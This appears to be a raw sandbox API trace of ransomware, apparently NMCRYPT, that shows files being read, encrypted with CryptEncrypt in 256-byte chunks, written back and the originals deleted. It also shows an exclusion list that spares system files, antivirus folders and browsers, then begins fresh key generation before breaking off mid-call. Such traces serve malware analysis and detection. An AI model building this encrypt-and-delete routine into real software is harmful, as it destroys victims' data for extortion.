0x0 [0149.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.267] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.267] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.267] GetLastError () returned 0x0 [0149.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.267] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.267] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.267] GetLastError () returned 0x0 [0149.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.267] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.267] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.267] GetLastError () returned 0x0 [0149.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.267] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.267] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.267] GetLastError () returned 0x0 [0149.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.267] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.267] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.267] GetLastError () returned 0x0 [0149.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.268] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.268] GetLastError () returned 0x0 [0149.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.268] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.268] GetLastError () returned 0x0 [0149.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.268] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.268] GetLastError () returned 0x0 [0149.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.268] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.268] GetLastError () returned 0x0 [0149.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.268] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.268] GetLastError () returned 0x0 [0149.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.268] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.268] GetLastError () returned 0x0 [0149.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.269] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.269] GetLastError () returned 0x0 [0149.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.269] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.269] GetLastError () returned 0x0 [0149.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.269] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.269] GetLastError () returned 0x0 [0149.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.269] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.269] GetLastError () returned 0x0 [0149.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.269] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.269] GetLastError () returned 0x0 [0149.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.269] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.269] GetLastError () returned 0x0 [0149.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.269] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.270] GetLastError () returned 0x0 [0149.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.270] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.270] GetLastError () returned 0x0 [0149.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.270] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.270] GetLastError () returned 0x0 [0149.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.270] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.270] GetLastError () returned 0x0 [0149.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x1e, lpOverlapped=0x0) returned 1 [0149.270] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x1e, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x20) returned 1 [0149.270] GetLastError () returned 0x0 [0149.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x20, lpOverlapped=0x0) returned 1 [0149.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0149.270] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0149.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0149.271] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi", dwFileAttributes=0x20) returned 0 [0149.271] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 1 [0149.271] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0 [0149.271] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" [0149.271] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0149.271] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBA0F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxba0f.tmp")) returned 0xba0f [0149.272] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBA0F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxba0f.tmp"), dwFlags=0x1) returned 0 [0149.272] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXBA0F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxba0f.tmp")) returned 1 [0149.272] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0149.272] wcslen (_String="OK") returned 0x2 [0149.272] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0149.272] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0149.272] CryptDestroyKey (hKey=0x9ad778) returned 1 [0149.272] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0149.272] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0149.272] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*NMCRYPT") returned 0 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*Recovers your files.html") returned 0 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*.exe") returned 0 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*.dll") returned 0 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*.lnk") returned 0 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*.bat") returned 0 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*.ini") returned 0 [0149.272] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*.msi") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*.scf") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*pagefile.sys*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*NTUSER.DAT*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*AppData*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\winrar\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\java\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\windows\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\ESET\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\AVG\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\AVIRA\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*Atheros*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*Realtek*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*bootmgr*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*boot*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*boot*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*CONFIG.SYS*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*IO.SYS*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*MSDOS.SYS*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*NTDETECT.COM*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*ntldr*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*chrome*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*opera*") returned 0 [0149.273] PathMatchSpecW (pszFile="boxed-split.avi", pszSpec="*firefox*") returned 0 [0149.273] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi", pszSpec="*") returned 1 [0149.273] strlen (_Str="NMoreira") returned 0x8 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, 